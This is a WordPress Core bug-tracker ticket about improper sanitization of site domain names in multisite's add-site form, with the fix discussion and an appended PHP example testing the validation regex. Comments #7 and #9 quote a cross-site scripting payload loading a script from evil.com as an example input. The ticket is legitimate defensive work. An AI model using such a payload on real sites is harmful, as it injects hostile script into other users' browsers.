Make WordPress Core

Opened 13 years ago

Closed 13 years ago

#11777 closed defect (bug) (fixed)

ms-edit.php / addblog action improperly sanitizes domains

Reported by: Denis-de-Bernardy Owned by: ryan
Milestone: 3.0 Priority: normal
Severity: normal Version: 3.0
Component: Security Keywords:
Focuses: multisite Cc:

Description

it uses sanitize_user in non-strict mode with a twist:

$domain = sanitize_user( str_replace( '/', '', $blog[ 'domain' ] ) );

as I read sanitize_user, this can allow for subdomains with improper characters in them.

Change History (10)

#1 @nacin
13 years ago

  • Keywords multisite added

#2 follow-up: @Denis-de-Bernardy
13 years ago

ms-options.php has a slightly different approach to sanitization, which is equally bug prone:

$blogname = untrailingslashit( sanitize_user( str_replace( '.', '', str_replace( $current_site->domain . $current_site->path, '', $details->domain . $details->path ) ) ) );

#4 @wpmuguru
13 years ago

(In [13630]) block invalid site names/urls in add site, see #11777

#5 in reply to: ↑ 2 @wpmuguru
13 years ago

Replying to Denis-de-Bernardy:

ms-options.php has a slightly different approach to sanitization, which is equally bug prone:

$blogname = untrailingslashit( sanitize_user( str_replace( '.', '', str_replace( $current_site->domain . $current_site->path, '', $details->domain . $details->path ) ) ) );

That's for display only. If the dashboard blog is dashboard.domain.com or domain.com/dashboard, then dashboard is shown in the textbox.

#6 @wpmuguru
13 years ago

  • Resolution set to fixed
  • Status changed from new to closed

#7 follow-up: @Denis-de-Bernardy
13 years ago

doesn't r13630 allow a completely unsanitized domain name to go in provided it contains -- in it? such as:

evil--<script src="http://evil.com/xss.js"></script>

#8 @Denis-de-Bernardy
13 years ago

  • Resolution fixed deleted
  • Status changed from closed to reopened

#9 in reply to: ↑ 7 @wpmuguru
13 years ago

Replying to Denis-de-Bernardy:

doesn't r13630 allow a completely unsanitized domain name to go in provided it contains -- in it? such as:

evil--<script src="http://evil.com/xss.js"></script>

It would block that. See line 139

if ( ! preg_match( '/(--)/', $blog[ 'domain' ] ) && preg_match( '|^([a-zA-Z0-9-])+$|', $blog[ 'domain' ] ) )

The only characters allowed in the domain name are a-zA-Z0-9-.
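
Added example, not code from the ticket or from WordPress itself: the condition quoted in comment #9, next to a stricter hostname-label check (assumed here, not part of r13630), both run over constructed sample inputs so the allow/block outcome of each is visible.

```php
<?php
// Mirrors the r13630 condition quoted in comment #9: reject any "--",
// then allow only the characters a-zA-Z0-9 and "-".
function r13630_domain_ok( string $domain ): bool {
    return ! preg_match( '/(--)/', $domain )
        && preg_match( '|^([a-zA-Z0-9-])+$|', $domain ) === 1;
}

// Stricter label check (added here, not from the ticket): \A and \z refuse a
// trailing newline that PCRE's "$" tolerates without the D modifier, a label
// may not start or end with "-", and it is limited to 63 octets as in DNS.
// The "--" rejection from the ticket is kept for consistency.
function strict_label_ok( string $domain ): bool {
    return preg_match( '/\A(?!-)[a-zA-Z0-9-]{1,63}(?<!-)\z/', $domain ) === 1
        && strpos( $domain, '--' ) === false;
}

// Constructed inputs: valid labels, the payload from comment #7,
// a dotted name, a trailing newline, and a leading hyphen.
$samples = [
    'blog1',
    'my-blog',
    'evil--<script src="http://evil.com/xss.js"></script>',
    'evil--blog',
    'sub.domain',
    "blog\n",
    '-leading',
];

foreach ( $samples as $s ) {
    printf( "%-58s r13630: %-5s strict: %s\n",
        json_encode( $s ),
        r13630_domain_ok( $s ) ? 'allow' : 'block',
        strict_label_ok( $s ) ? 'allow' : 'block' );
}
```

Only "blog1" and "my-blog" pass both checks; "blog\n" is the one input the r13630 regex accepts but the stricter check refuses.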

#10 @nacin
13 years ago

  • Resolution set to fixed
  • Status changed from reopened to closed